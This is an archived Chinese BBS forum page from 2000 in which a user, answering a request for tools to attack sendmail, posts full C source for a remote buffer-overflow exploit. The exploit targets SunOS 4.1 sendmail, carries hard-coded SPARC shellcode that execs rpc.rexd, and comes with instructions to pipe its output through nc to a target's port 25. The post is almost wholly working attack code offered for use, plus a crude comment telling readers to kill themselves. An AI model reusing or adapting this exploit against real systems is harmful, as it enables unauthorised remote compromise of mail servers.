378.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="379.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦！！！), 信区: Security <br>
标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug  5 08:49:49 2000) <br>
  <br>
/* <br>
 *  Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd. <br>
 *  If you don't know what to do from there, kill yourself. <br>
 *  Remote stack pointer is guessed, the offset from it to the code is 188. <br>
 * <br>
 *  Use:    smrex buffersize padding |nc hostname 25 <br>
 * <br>
 *  where `padding` is a small integer, 1 works on my sparc 1+ <br>
 * <br>
 *  I use smrex 84 1, play with the numbers and see what happens.  The core <br>
 *  gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and <br>
 *  see where your offsets went wrong :) <br>
 * <br>
 *  I don't *think* this is the 8lgm syslog() overflow - see how many versions <br>
 *  of sendmail this has carried over into and let me know.  Or don't, I <br>
 *  wouldn't :) <br>
 * <br>
 *  P.S. I'm *sure* there are cleverer ways of doing this overflow.  So sue <br>
 *  me, I'm new to this overflow business..in my day everyone ran YPSERV and <br>

 *  things were far simpler... :) <br>
 * <br>
 *  The Army of the Twelve Monkeys in '98 - still free, still kicking arse. <br>
 */ <br>
#include <stdio.h> <br>
int main(int argc, char **argv) <br>
{ <br>
    long unsigned int large_string[10000]; <br>
    int i, prelude; <br>
    unsigned long offset; <br>
    char padding[50]; <br>
    offset  = 188;                          /* Magic numbers */ <br>
    prelude = atoi(argv[1]); <br>
    if (argc < 2) <br>
    { <br>
        printf("Usage: %s  bufsize <alignment offset> | nc target 25\n", <br>
            argv[0]); <br>
        exit(1); <br>
    } <br>
    for (i = 6; i < (6 + atoi(argv[2])); i++) <br>
    { <br>
        strcat(padding, "A"); <br>

    } <br>
    for(i = 0; i < prelude; i++) <br>
    { <br>
        large_string[i] = 0xfffffff0;       /* Illegal instruction */ <br>
    } <br>
    large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of %fp */ <br>
    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */ <br>
    for( i = (prelude + 2); i < (prelude + 64); i++) <br>
    { <br>
        large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */ <br>
    } <br>
                        /* Now the sparc execve /usr/etc/rpc.rexd code.. */ <br>
        large_string[prelude + 64] = 0x250bcbc8; <br>
        large_string[prelude + 65] = 0xa414af75; <br>
        large_string[prelude + 66] = 0x271cdc88; <br>
        large_string[prelude + 67] = 0xa614ef65; <br>
        large_string[prelude + 68] = 0x291d18c8; <br>
        large_string[prelude + 69] = 0xa8152f72; <br>
        large_string[prelude + 70] = 0x2b1c18c8; <br>
        large_string[prelude + 71] = 0xaa156e72; <br>
        large_string[prelude + 72] = 0x2d195e19; <br>
        large_string[prelude + 73] = 0x900b800e; <br>

        large_string[prelude + 74] = 0x9203a014; <br>
        large_string[prelude + 75] = 0x941ac00b; <br>
        large_string[prelude + 76] = 0x9c03a104; <br>
        large_string[prelude + 77] = 0xe43bbefc; <br>
        large_string[prelude + 78] = 0xe83bbf04; <br>
        large_string[prelude + 79] = 0xec23bf0c; <br>
        large_string[prelude + 80] = 0xdc23bf10; <br>
        large_string[prelude + 81] = 0xc023bf14; <br>
        large_string[prelude + 82] = 0x8210203b; <br>
        large_string[prelude + 83] = 0xaa103fff; <br>
        large_string[prelude + 84] = 0x91d56001; <br>
        large_string[prelude + 85] = 0xa61cc013; <br>
        large_string[prelude + 86] = 0xa61cc013; <br>
        large_string[prelude + 87] = 0xa61cc013; <br>
        large_string[prelude + 88] = 0; <br>
                        /* And finally, the overflow..simple, huh? :) */ <br>
    printf("helo\n"); <br>
    printf("mail from: %s%s\n", padding, large_string); <br>
} <br>
  <br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>

  <br>
  <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="379.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>